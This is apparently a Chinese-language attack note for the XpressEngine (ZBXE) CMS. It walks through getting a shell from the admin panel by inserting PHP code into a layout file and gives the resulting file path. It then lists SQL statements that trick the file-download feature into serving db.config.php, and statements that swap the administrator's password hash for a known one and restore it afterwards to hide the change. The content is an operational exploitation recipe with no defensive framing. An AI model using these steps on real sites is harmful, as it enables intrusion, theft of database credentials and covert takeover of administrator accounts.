ZBXE/zeroboardxe/xepress/xpressengine 后台getshell

http://192.168.1.111/xe/index.php?module=admin&act=dispLayoutAdminInstalledList

随便点一个layouts
http://192.168.1.111/xe/index.php?module=admin&act=dispLayoutAdminInstanceList&layout=default

编辑/edit
http://192.168.1.111/xe/index.php?module=admin&act=dispLayoutAdminEdit&layout=default&layout_srl=132

HTML – layout.html 添加php后门代码

<?php phpinfo();?>

可以点预览执行代码，或者点保存生成文件，位置在：
/files/faceOff/$layout_srl/layout.html

以上layout的值为132，路径就是
/files/faceOff/132/layout.html

得到xpressengine数据库控制权限，可以下载他的数据库配置文件：

找到一个下载文件的地址，记住sid值，
查询信息以备份。

select * from xe_files where sid='01f22ad27d6dd6361d18ade5729a5e11'

记好uploaded_filename字段值。
修改下载文件的真实路径，

update xe_files set uploaded_filename='./files/config/db.config.php' where sid='01f22ad27d6dd6361d18ade5729a5e11'

下载完还原源文件

update xe_files set uploaded_filename='源文件名' where sid='01f22ad27d6dd6361d18ade5729a5e11'

直接修改xe后台密码

先查出管理员信息

SELECT user_id,email_address,password,is_admin FROM xe_member WHERE is_admin='Y'

xxx@gmail.com
保存原password字段值 sha256:0008192:ezgIIppAYQNk:v2Q+INN9NmIbibZVdpDEXrDPuybOMXcW
修改password

update xe_member set password='sha256:0008192:gEFCf3zZi0Os:Q5Rrq9CX7A8HOC+PrvYGxtbbaVwU/hrJ' where email_address='xxx@gmail.com'

以上password被设置成lasser

干完还原密码

update xe_member set password='sha256:0008192:ezgIIppAYQNk:v2Q+INN9NmIbibZVdpDEXrDPuybOMXcW' where email_address='hym1150@gmail.com'